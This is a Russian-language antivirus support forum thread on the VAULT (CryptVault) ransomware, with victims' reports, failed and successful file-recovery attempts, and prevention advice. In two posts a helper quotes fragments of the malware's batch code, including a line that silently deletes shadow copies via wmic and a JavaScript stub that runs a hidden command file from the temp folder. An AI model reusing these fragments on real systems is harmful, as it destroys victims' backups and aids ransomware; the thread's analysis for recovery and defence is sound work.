файлы зашифрованы с расширением .vault , bat encoder /CryptVault

RSS
Зашифровались файлы с расшрирением  doc. и так далее. Cтали с расширением, например doc.vault. При загрузке компа выскакивает окно с ссылкой на сайт злоумышленников. Плз. помогите.

Ответы

Цитата
santy написал:
pubring.gpg обычно не перезаписывается мусором, и не удаляется.
а вот secring.gpg по алгоритму прежде чем удалить, забивают полезную инфу мусором.
Ладно, пойду узнаю сколько стоит это все восстановить....
по мотивам беседы с Оксаной.

Ищут пожарные, ищет милиция...Ищут давно, Но не могут найти..." (с), С.Маршак.

Очередная активность вулкана по имени ВАУЛТ вновь накрыла своей электронной волной беспечных пользователей, которые уютно устроились у монитора, принимая извергаемый сетевой "пепел" за манну небесную.

восстановить утраченные в результате внезапной атаки (а так же отсутствия архивных и теневых копий) файлы крайне сложно, во-первых, в силу их шифрования, во-вторых, тщательной зачистки оригинальных документов после удаления.

для проверки возможности восстановления удаленных документов после завершения процесса шифрования использовались несколько инструментов:

getdataback,
r-studio,
ontrack easy recovery,
hetman partition recovery,
testdisk,
winhex


для теста использовались несколько папок с документами:
doc, xls, pdf, jpg, rtf, txt, rar

не ставил цели сравнить данные инструменты, кто лучше, быстрее и больше восстановит документов.
надо было просто посмотреть что подобные инструменты могут что-то восстановить после целенаправленного шифрования и удаления документов.
В случае с ВАУЛТОМ цель не достигнута. документов восстановлено минимальное количество, а след секретного ключа (secring.gpg) не найден.

поиски в winhex по известным hex (9501D804558F43D6010400BA49F79C06, 9501D804558F3209010400BE8B3CB164, 9501D80455A4EE32010400B53F95F674), и символьным (-----BEGIN PGP PRIVATE KEY BLOCK-----,-----END PGP PRIVATE KEY BLOCK-----) сигнатурам не дали результат.

отсюда вывод: надежда на восстановление документов специализированными инструментами крайне мала, после того как "их санкции порвали в клочья нашу экономику"

отсюда другая надежда: на превентивную защиту от запуска шифраторов. например, Cryptoprevent, а так же на создание защищенных разделов для документов с помощью HIPS.

(с), chklst.ru
Изменено: santy - 04.06.2016 18:07:56
Доброй ночи!

Схватил VAULT 21.08.15г  с письмом на mail.с архивом ZIP ,типо с счетом . испробовал все!!  В итоге воспользовался  восстановкой потерянных данных :Компьютер- Рабочий Стол- папка с доками- восстаовить прежнюю версию.  Воссстановилось все!  Все работает . Дублирующие файлы формата VAULT  отсортировал по типу и удалил.
Виктор, поздравляю, зачастую, точки восстановления тоже затираются, так что Вам повезло   :)
ESET Technical Support
Добрый день! К сожалению, столкнулся с такой же незадачей: сотрудница запустила вирус на своей машине и "зашифровала", естественно крайне важную и необходимую, информацию. По дате отобрал файлы, какие смог найти на компьютере. Отправил на почту santy, указанную выше. Буду очень признателен, если найдется время проверить архив и возможность восстановления информации. Заранее спасибо!
Константин Гончаров,
ответил в почту.
опыт показывает за последние полтора года, что пост_реакция часто не успевает за новым ходом мошенников, потому надо  перестраивать работу в направлении реализации превентивных мер: настройка локальных политик, создание правил ХИПС, регулярного создания архивных и теневых копий документов, доведения до пользователей меры опасности при работе в сети с электронной почтой и браузерами.
Изменено: santy - 04.06.2016 17:32:48
Добрый день!
На работе словли эту напасть. Обидно, что за два дня до этого активировали купленную лицензию на SMART SECURITY, в замен Каспера (который, если верить сети, эту гадость ловит:(). Маил письмо пропустил, хотя попытку переслать это письмо мне пресек. Антивирус тоже сфилонил.

Шифратор отработал, ключ потер. Но теневые копии нашлись через ShadowExplorer (хотя в свойствах файлов Предыдущих версий уже не было) - спасибо Вам за наводку.

Посмотрел отчет, как отработал Esset (скрин прилагаю) - отловил KillBackup, Filecoder, Runner.BC (ну, хоть за это большое спасибо ему). Хотя непонятно, он его отловил, но как-то частично - более 15 000 документов и картинок зашифровано, ключ потерт. Фото тер по непонятному принципу - т.е. потер, но не все.  
EssetSS8.png (163.36 КБ)
Изменено: Станислав Перевозников - 04.06.2016 18:07:56
Станислав,
если не трудно, добавьте лог журнала обнаружения угроз.
судя по рисунку, ESET прибил скриптик vbs, который удаляет теневые копии, возможно до его запуска, потому теневые копии сохранились

судя по коду шифратора так и есть.
Код
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\59665d79.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\59665d79.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\59665d79.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\59665d79.vbs"
Изменено: santy - 04.06.2016 18:07:56
Цитата
santy написал:
Станислав,
если не трудно, добавьте  лог журнала обнаружения угроз.
судя по рисунку, ESET прибил скриптик vbs, который удаляет теневые копии, возможно до его запуска, потому теневые копии сохранились

Но, частично он их испортил - тк в свойствах документа версий не было, только через прогу нашлись.
Изменено: Станислав Перевозников - 04.06.2016 18:07:56
27.10.2015 11:15:29 Защита в режиме реального времени файл C:\Users\23\AppData\Local\Temp\27ddf88e.js BAT/Filecoder.AG троянская программа очищен удалением - изолирован 23-ПК\23 Событие произошло в новом файле, созданном следующим приложением: C:\Windows\System32\cmd.exe.

Цитата
echo var cdp="%%TEMP%%\\05542988.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\27ddf88e.js"

этот скриптик, скорее всего уже после запуска был удален. здесь удаление файла не повлияло на процесс шифрования.
Изменено: santy - 04.06.2016 18:08:54
Читают тему (гостей: 16)